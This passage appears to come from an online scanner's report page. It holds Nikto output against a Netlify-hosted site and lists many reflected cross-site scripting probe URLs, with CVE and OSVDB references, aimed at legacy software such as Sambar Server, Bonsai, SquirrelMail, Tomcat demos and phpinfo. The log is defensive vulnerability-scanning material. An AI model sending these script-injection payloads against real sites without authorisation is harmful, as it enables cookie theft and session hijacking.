+ [003083] /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>: Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0375
+ [003086] /aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>: Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1212
+ [003117] /webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>: Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). See: OSVDB-3632
+ [003118] /webcalendar/week.php?user=\"><script>alert(document.cookie)</script>: Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). See: OSVDB-3633
+ [003122] /debug/dbg?host==<script>alert('Vulnerable');</script>: The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. See: OSVDB-3762
+ [003123] /debug/echo?name=<script>alert('Vulnerable');</script>: The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. See: OSVDB-3762
+ [003124] /debug/errorInfo?title===<script>alert('Vulnerable');</script>: The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. See: OSVDB-3762
+ [003125] /debug/showproc?proc===<script>alert('Vulnerable');</script>: The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. See: OSVDB-3762
+ [003170] /addressbook.php?\"><script>alert(Vulnerable)</script><!--: Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1131
+ [003173] /help.php?chapter=<script>alert('Vulnerable')</script>: Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1131
+ [003226] /wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003227] /sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003228] /sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003229] /sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003230] /sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003231] /sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003232] /sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003233] /sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003234] /sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003235] /sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003236] /sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003237] /sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003238] /sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003239] /sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003240] /sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003241] /sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003242] /sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003243] /sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003244] /sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003245] /sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003246] /sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003247] /sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003248] /sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003249] /sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003250] /sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003251] /sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003254] /syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003255] /syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>&bar=456: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003256] /syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003257] /syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003258] /syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003259] /netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003260] /netutils/findata.stm?host=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003261] /netutils/findata.stm?user=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003262] /sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Mar/265
+ [003274] /webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD: Bonsai is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0154
+ [003276] /webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>: Bonsai is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0154
+ [003277] /webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week: Bonsai is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0154
+ [003280] /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>: Bonsai is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0153
+ [003281] /webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>: Bonsai is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0153
+ [003284] /webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>: Bonsai is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0154
+ [003286] /webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>: Bonsai is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0154
+ [003355] /pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>: Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2029
+ [003410] /shopadmin.asp?Password=abc&UserName=\"><script>alert(foo)</script>: VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3685
+ [003411] /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: PHP contains a flaw that allows a remote cross site scripting attack. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3388
+ [003412] /phpinfo.php?cx[]=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<script>alert(foo)</script>: PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1663 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0996
+ [003497] /rpc.php?q=\"><script>alert(document.cookie)</script>: Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3685
+ [003595] /jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert(111)</script>: The tomcat demo files are installed, which are vulnerable to an XSS attack. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4838
+ [003596] /jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert(112)</script>: The tomcat demo files are installed, which are vulnerable to an XSS attack. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4838
+ [003597] /jsp-examples/jsp2/el/functions.jsp?foo=<script>alert(113)</script>: The Tomcat demo files are installed, which are vulnerable to an XSS attack. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4838
+ [006195] /scripts/message/message_dialog.tml?how_many_back=\"><script>alert(1)</script>: Lyris ListManager Cross-Site Scripting. See: https://www.procheckup.com/media/zjkb3pmc/new-listmanager-paper-v2.pdf
+ Scan terminated: 0 errors and 205 items reported on the remote host
+ End Time: 2026-03-04 12:05:42 (GMT-5) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Detailed report
-
Target
trendingrd.netlify.app
-
Target IP
18.208.88.157
-
Scan method
Nikto scan (max 60 sec)
-
Run command
nikto -host trendingrd.netlify.app -maxtime 60
- Duration
- Quick report
-
Scan date
04 Mar 2026 12:05
-
Copy scan report
- Download report
- Remove scan result
- Check ports
- API - Scan ID